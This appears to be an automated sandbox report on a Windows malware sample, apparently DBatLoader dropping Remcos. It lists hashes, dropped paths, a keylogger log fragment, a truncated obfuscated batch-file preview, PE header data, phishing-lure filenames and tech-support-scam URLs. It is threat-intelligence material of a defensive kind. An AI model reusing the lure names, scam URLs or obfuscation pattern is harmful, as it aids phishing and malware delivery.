a0e9f5d64349fb13191bc781f81f42e1 | i1crvbOZAP.exe | malicious | Amadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader | 13.107.139.11
a0e9f5d64349fb13191bc781f81f42e1 | 7gA40t6M1y.exe | malicious | LummaC | 13.107.139.11
a0e9f5d64349fb13191bc781f81f42e1 | aMObJ2eTUf.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRAT | 13.107.139.11
a0e9f5d64349fb13191bc781f81f42e1 | https://d2b0yahslb04qh.cloudfront.net/W0in0sNw0S0sh01Er038/index.html?ph0ne=+1-833-317-3190 | malicious | TechSupportScam | 13.107.139.11
a0e9f5d64349fb13191bc781f81f42e1 | https://d24s8bqqqoxjsw.cloudfront.net/Wi0n088StJnyEr087/index.html | malicious | Unknown | 13.107.139.11
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\Public\Libraries\wkrriuhD.pif | aMObJ2eTUf.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRAT |
C:\Users\Public\Libraries\wkrriuhD.pif | Inquiry_GMD_Specifications_7266738879_G#2024.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
C:\Users\Public\Libraries\wkrriuhD.pif | SecuriteInfo.com.Win32.Evo-gen.9756.30202.exe | malicious | Remcos, DBatLoader |
C:\Users\Public\Libraries\wkrriuhD.pif | SecuriteInfo.com.Win32.Evo-gen.7105.24636.exe | malicious | Remcos, DBatLoader |
C:\Users\Public\Libraries\wkrriuhD.pif | Material Purchase Order for the Supply.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
C:\Users\Public\Libraries\wkrriuhD.pif | product_order.cmd | malicious | Remcos, DBatLoader |
C:\Users\Public\Libraries\wkrriuhD.pif | ungziped_file.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
C:\Users\Public\Libraries\wkrriuhD.pif | DHL SHIPPING DOCUMENT - BL - AWB PACKING LIST_02292024.exe | malicious | DBatLoader, PureLog Stealer, zgRAT |
C:\Users\Public\Libraries\wkrriuhD.pif | DHL SHIPPING DOCUMENT - BL - AWB PACKING LIST_02292024.exe | malicious | DBatLoader, RedLine |
C:\Users\Public\Libraries\wkrriuhD.pif | DHL_AWB#6078538091.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
C:\Windows \System32\2506803.exe | aMObJ2eTUf.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRAT |
C:\Windows \System32\2506803.exe | Inquiry_GMD_Specifications_7266738879_G#2024.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
C:\Windows \System32\2506803.exe | ENQUNION096424 CLOSING DATE URGENT.bat | malicious | Remcos, DBatLoader |
C:\Windows \System32\2506803.exe | PI-BD2403001.exe | malicious | Remcos, DBatLoader |
C:\Windows \System32\2506803.exe | Order inquiry.bat | malicious | Remcos, DBatLoader |
C:\Windows \System32\2506803.exe | Statement Of Account - Overdue Payments #94839540823489.bat | malicious | Remcos, DBatLoader |
C:\Windows \System32\2506803.exe | Document.exe | malicious | Remcos, DBatLoader |
C:\Windows \System32\2506803.exe | BBRAUN VIETNAM - RFQ-QT240422703-01 - 3-29-2024-20-00.exe | malicious | DBatLoader, FormBook |
C:\Windows \System32\2506803.exe | SecuriteInfo.com.Win32.Evo-gen.9756.30202.exe | malicious | Remcos, DBatLoader |
C:\Windows \System32\2506803.exe | SecuriteInfo.com.Win32.Evo-gen.7105.24636.exe | malicious | Remcos, DBatLoader |

Process:C:\Users\Public\Libraries\wkrriuhD.pif
File Type:data
Category:dropped
Size (bytes):288
Entropy (8bit):3.3403739461321296
Encrypted:false
SSDEEP:3:rhlKlrl9Nrx5JWRal2Jl+7R0DAlBG45klovDl6ALilXIkqoojklovDl6ALilXIk/:6lz5YcIeeDAlOWAAe5q1gWAAe5q1gWAv
MD5:53F39060C128C092FE1DEDCE56FD722D
SHA1:211DA2844034599DFD2D5DEEE5289A6ACDCE90A8
SHA-256:2EBF058C161E48889668A5AD8552D488EA9CAA3441E09EBFD23930960806FAD6
SHA-512:4DE7FCCCE0A21319FD7010AAF0C7C4C2A0BAB454B1FD4A85967887EBCA3B55C8E95315B2126CACA9EA47579B7B935434C92FC7C82B1BD6A0064754C7852448A6
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview:....[.2.0.2.4./.0.3./.2.8. .1.3.:.5.9.:.1.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

Process:C:\Users\user\Desktop\midyear_statement.exe
File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Dhuirrkw.PIF">), ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):100
Entropy (8bit):5.060889316089751
Encrypted:false
SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMYWe41CHovsb9OvfAKov:HRYFVmTWDyzcLEyE9OQKy
MD5:98CEDD728217C8E88B50667980974A9F
SHA1:D99A98F1722AEDCB9EE60D08C38CFADE3CB22A3F
SHA-256:5F0DF8D30DF5428164AAABADCD1D8B873186C6E0D5247B157196C32696F28F77
SHA-512:EB629799815FA585816309776484ECEDB462EDC1FD7A17D969588ABA80626F107B41CFFC7972C227C53604E08F077A84E427CD2D11B5CEB45A1E2B150D982013
Malicious:true
Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Dhuirrkw.PIF"..IconIndex=54..HotKey=21..

Process:C:\Windows\SysWOW64\extrac32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1265664
Entropy (8bit):7.0065077195606165
Encrypted:false
SSDEEP:12288:evGkW/sci4Vup7XNihvMHH59TpfLFhLme7iEEEblTHQE1ZEQrfvAcEH+DwxTe8g:e+Rg+up7XNiyHZ994eHQEQahz
MD5:DD8E3F6AC5C24960B3A69490082C60E1
SHA1:C5F8AAEC5BAA571791789DD5FAC53E27938DBC29
SHA-256:15DB18392D7BBF15B30E528DB05EC306E00AC3227277D0639064EC3E2BC98C73
SHA-512:AC96E6FB368F5E2C8B8A80EB32635357F1931838B8575125956FE2E3C2465B7BD228606635F3563BB0A047B3BC8FBD19D25E0609210C4574C05993EC078AD205
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 26%
Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................R......L........ ....@..............................................@...........................P..N%...............................m...................................................V...............................text............................... ..`.itext.............................. ..`.data...|.... ......................@....bss....p6...............................idata..N%...P...&..................@....tls....4................................rdata..............................@..@.reloc...m.......n..................@..B.rsrc................z..............@..@.....................P..............@..@................................................................................................

Process:C:\Users\user\Desktop\midyear_statement.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4
Entropy (8bit):2.0
Encrypted:false
SSDEEP:3:Vy:s
MD5:E655C6429C1DFBA3509EEA2FC2108EFF
SHA1:6D8A1F6E74D27B3EB0E07AD8AF02F9DF002462FA
SHA-256:A77B54178E2066FDC29229D4C0B59051CAEDC92E918E037928E185D39AD86316
SHA-512:E31042C3AA2A0FF85FD261F04F63FA33EA0C5A348D9D8A23FA8092ED9ABCFD881E130D25284143ADE9E80CFEAE95988B92EC79F2A75EFC1A61B548CBEA0CB1C7
Malicious:false
Preview:37..

Process:C:\Users\user\Desktop\midyear_statement.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):68096
Entropy (8bit):6.328046551801531
Encrypted:false
SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
MD5:C116D3604CEAFE7057D77FF27552C215
SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:
• Filename: aMObJ2eTUf.exe, Detection: malicious
• Filename: Inquiry_GMD_Specifications_7266738879_G#2024.cmd, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Evo-gen.9756.30202.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Evo-gen.7105.24636.exe, Detection: malicious
• Filename: Material Purchase Order for the Supply.exe, Detection: malicious
• Filename: product_order.cmd, Detection: malicious
• Filename: ungziped_file.exe, Detection: malicious
• Filename: DHL SHIPPING DOCUMENT - BL - AWB PACKING LIST_02292024.exe, Detection: malicious
• Filename: DHL SHIPPING DOCUMENT - BL - AWB PACKING LIST_02292024.exe, Detection: malicious
• Filename: DHL_AWB#6078538091.exe, Detection: malicious
Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

Process:C:\Users\Public\Libraries\wkrriuhD.pif
File Type:JSON data
Category:dropped
Size (bytes):989
Entropy (8bit):5.019408940029604
Encrypted:false
SSDEEP:12:tkEU+nd6UGkMyGWKyGXPVGArwY3yGhsp+axH0sp+GYArpv/mOAaNO+ao9W7iN5zp:qydVauKyGX852sesPvXhNlT3/75ciWro
MD5:D3D1956DA737B1B3EF05DA28210D81B7
SHA1:40287B4136212BFD82AE0388DD3178721926FCDB
SHA-256:0BA354EA36476D11344D1E20DED0C3658FD39B6D436C916AE02FB1E7DC47D742
SHA-512:EA5BAF54FBB5BFD754308DCF2F9C77E9840BA8B194906060A77958F22CC76F5CDC317D68566EFEAD200D4934EF2DBECDBC3DCA089327AC7771136C9AE8AEB7D9
Malicious:false
Preview:{. "geoplugin_request":"102.165.48.43",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Washington",. "geoplugin_region":"District of Columbia",. "geoplugin_regionCode":"DC",. "geoplugin_regionName":"District of Columbia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"511",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"38.894",. "geoplugin_longitude":"-77.0365",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1510207563435464
Encrypted:false
SSDEEP:3:NlllulRjFllp:NllU
MD5:7B390667B7AD392C3A7ECD95310E0D68
SHA1:F7ED92E360DACA5B2BB3152AFB8A26DD5A408706
SHA-256:E233F71BD3E7F3B34DC94F8F9DDB533F59E07BE7AEFA021541DF0160436E1C0D
SHA-512:0131C5BD611E47AF843A354F9AD83CAE0AA4A64B0FB723BB485B9FBDBF409A98BB5248336BCDE84FF72E3EB44D2EC10C30133767CD0DE32C77757C0EE75DCCC2
Malicious:false
Preview:@...e.................................@. ............@..........

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Users\Public\Libraries\wkrriuhD.pif
File Type:Extensible storage engine DataBase, version 0x620, checksum 0xbda68b75, page size 32768, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):14680064
Entropy (8bit):0.9773375313961997
Encrypted:false
SSDEEP:6144:ggMnQEUUMBPPpBPJmNjfiEWC7WswQpWK/qZCCkxpu514dCVZ3L9yqXx4SU8GxJHL:xn/cj5tND5ApBK4K
MD5:4D670AFC0ACDE5EFAFDD756D8D7444E1
SHA1:3D805BD200DBB8A3E12CC418A663DABA241E6986
SHA-256:87AD9A15E53285B2D2714912F27967B2B24EB75B161920D288D36FC9A807C127
SHA-512:7D6364D4F8CC981CAFDA46095BD19B3AD8472CB00039CF495604754DB76D7F123B93812F6BFB8AB56A5EC7CA3B7C454370CAB0203CA2A000C140EC43BF0022EC
Malicious:false
Preview:...u... ................./..(...{........................&......6...{5.9:...|..h.(.........................:.I..(...{..............................................................................................P...........eJ......n........................................................................................................... .......93...{a..............................................................................................................................................................................................(...{...................................)..9:...|..................cd..9:...|...........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\Public\Libraries\wkrriuhD.pif
File Type:Unicode text, UTF-16, little-endian text, with no line terminators
Category:modified
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:Qn:Qn
MD5:F3B25701FE362EC84616A93A45CE9998
SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:false
Preview:..

Process:C:\Users\user\Desktop\midyear_statement.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):131648
Entropy (8bit):5.225468064273746
Encrypted:false
SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
MD5:231CE1E1D7D98B44371FFFF407D68B59
SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: aMObJ2eTUf.exe, Detection: malicious, Browse
• Filename: Inquiry_GMD_Specifications_7266738879_G#2024.cmd, Detection: malicious, Browse
• Filename: ENQUNION096424 CLOSING DATE URGENT.bat, Detection: malicious, Browse
• Filename: PI-BD2403001.exe, Detection: malicious, Browse
• Filename: Order inquiry.bat, Detection: malicious, Browse
• Filename: Statement Of Account - Overdue Payments #94839540823489.bat, Detection: malicious, Browse
• Filename: Document.exe, Detection: malicious, Browse
• Filename: BBRAUN VIETNAM - RFQ-QT240422703-01 - 3-29-2024-20-00.exe, Detection: malicious, Browse
• Filename: SecuriteInfo.com.Win32.Evo-gen.9756.30202.exe, Detection: malicious, Browse
• Filename: SecuriteInfo.com.Win32.Evo-gen.7105.24636.exe, Detection: malicious, Browse
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\midyear_statement.exe
File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (432), with CRLF line terminators
Category:dropped
Size (bytes):11898
Entropy (8bit):4.716832845643102
Encrypted:false
SSDEEP:192:UPNoaJSjPMK2jxkXDmZevmhmpd/mGq5LnRWF7NpL29QeQoGAhLNTbz4UgHCHDQSq:KNjsjUKwxCiZevmgpd/jcnRu7imoG8Le
MD5:C545650595B479C81AD6B9D8882AAE39
SHA1:7A98AA2E6EEE23B3C1BBA876955D525BC618B3F0
SHA-256:A3A80983CB33159F0455FA0135789402558BAA1460DB94D0071318512B8CB5F9
SHA-512:85AC596A7DA9072A28C4178E4FDEDC98F1B49C8E3FE5612CFE464833297B13F65D2DC59B52D7FC9970CFF8F98D954111229AEC0ED9DDED454E03B0CF4EBB6FF3
Malicious:false
Preview:@echo off..@%.%e%.. . %c%......%h%.. %o%.... .% %....%o%...%f%.... %f% ...... %..s%.%e%. ........%t%......% %.... ..%"%. .%p%.........%g% .%D% ..%D%...%=% .%s%.%e%.. ......%t%... ...% %.......%"%..... .%..%pgDD%"%.. ..%j%..... %K% .%u%.. . %f%....%=%......%=%........%"%.... %..%pgDD%"%. . ...%s%.%n%.. ......%e%.... .. .%S%.... ..%P%.%N%... .%L%...%M% ..... %i%..... %y% ...%%jKuf%k% ..%"%...%..%pgDD%"%.... .%t%.%V%.. .. ...%n%.. .......%F% %G%.. .%K% %a% .%w% %X%.. . .%M%. ...%%jKuf%h%. . ....%2% ....%s%..%h%.......%"%.... ...%..%pgDD%"%.... .%e%........%w% ..... .%f%....%J% ........%q%........%K%. .... %y%....... ..%s% %u%.. ..%y%.... .....%%jKuf%r%..... ...

Process:C:\Users\user\Desktop\midyear_statement.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):115372
Entropy (8bit):5.091814440717213
Encrypted:false
SSDEEP:1536:sLW5ID3z1yOjXtZqmsGyhvI5jduvd9a8yCl7MbiRVRpz5u:sLWi/LZq3hvUuvd9a8BRpz5u
MD5:FA7AA88417D0C48807144A1A48FE3FBC
SHA1:6F5EC990B12D4A6075050A94E0D68D03781FA46D
SHA-256:2019DCD18BA7D5554A4A9DA882740AA883941670AF3DE9396960081A0F8AA098
SHA-512:99B2EB6F8E7D00A3803CBA229149E5E0CB67A3DEB607782C55FBACD25D9C074CCE83759DE15490EFF939D5AD98F26CDBD44395CC79FFE22753E16C3D9E3B5FFF
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 75%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........X......... ....."....................<a.............................0......%......... ..............................................................`..(...............\........................... ...(........................................................... .......".................. .P`........P....@.......(..............@.P..............P.......*..............@.P@........(....`.......0..............@.0@.............p.......4..............@.0@......................................p......................6..............@.0@.....................8..............@.0..CRT....X............@..............@.@.........h............B..............@.`.........\............D..............@.0B/4...................F..............@.PB/19..................J..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....
                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Entropy (8bit):7.0065077195606165
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                                                                                                        • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                        File name:midyear_statement.exe
                                                                                                                                                                                        File size:1'265'664 bytes
                                                                                                                                                                                        MD5:dd8e3f6ac5c24960b3a69490082c60e1
                                                                                                                                                                                        SHA1:c5f8aaec5baa571791789dd5fac53e27938dbc29
                                                                                                                                                                                        SHA256:15db18392d7bbf15b30e528db05ec306e00ac3227277d0639064ec3e2bc98c73
                                                                                                                                                                                        SHA512:ac96e6fb368f5e2c8b8a80eb32635357f1931838b8575125956fe2e3c2465b7bd228606635f3563bb0a047b3bc8fbd19d25e0609210c4574c05993ec078ad205
                                                                                                                                                                                        SSDEEP:12288:evGkW/sci4Vup7XNihvMHH59TpfLFhLme7iEEEblTHQE1ZEQrfvAcEH+DwxTe8g:e+Rg+up7XNiyHZ994eHQEQahz
                                                                                                                                                                                        TLSH:2E45AE6EE2ACC4B2D32305F9FA7EE2A454177F9D35D5A87628E05B4C8F24E442B18D43
                                                                                                                                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                                        Icon Hash:4545454582800145
                                                                                                                                                                                        Entrypoint:0x46174c
                                                                                                                                                                                        Entrypoint Section:.itext
                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                        DLL Characteristics:
                                                                                                                                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                        Import Hash:95e6ff319c3c0cad8b9eba5a52b7f0bf
                                                                                                                                                                                        Instruction
                                                                                                                                                                                        push ebp
                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                        add esp, FFFFFFF0h
                                                                                                                                                                                        mov eax, 0045FE9Ch
                                                                                                                                                                                        call 00007F8655B54D55h
                                                                                                                                                                                        mov eax, dword ptr [005003F0h]
                                                                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                                                                        call 00007F8655BA6389h
                                                                                                                                                                                        mov ecx, dword ptr [005004E4h]
                                                                                                                                                                                        mov eax, dword ptr [005003F0h]
                                                                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                                                                        mov edx, dword ptr [0045F200h]
                                                                                                                                                                                        call 00007F8655BA6389h
                                                                                                                                                                                        mov eax, dword ptr [005003F0h]
                                                                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                                                                        call 00007F8655BA63FDh
                                                                                                                                                                                        call 00007F8655B52C9Ch
                                                                                                                                                                                        lea eax, dword ptr [eax+00h]
add byte ptr [eax], al          ; repeated 64 times (disassembly of 00 00 zero-byte padding)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x105000 | 0x254e | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x111000 | 0x2d600 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10a000 | 0x6da4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x109000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1056f8 | 0x5cc | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5f0bc | 0x5f200 | 1ecf1d7143e499155380c4995f50b189 | False | 0.5161331718134035 | data | 6.510122862830429 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x61000 | 0x794 | 0x800 | e803240c858df3c127eb1809388764fc | False | 0.60107421875 | data | 5.9952669540002335 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x62000 | 0x9e57c | 0x9e600 | 4547ef6539e858cc93387f00c5dd2371 | False | 0.6012449437647988 | data | 7.201954364591318 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x101000 | 0x3670 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x105000 | 0x254e | 0x2600 | f1ed380672936dc448e119c5c1d18db7 | False | 0.31743421052631576 | data | 4.935734860474981 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x108000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x109000 | 0x18 | 0x200 | 52e2cf246b2f6aee6ec066aa9d0e6490 | False | 0.05078125 | data | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
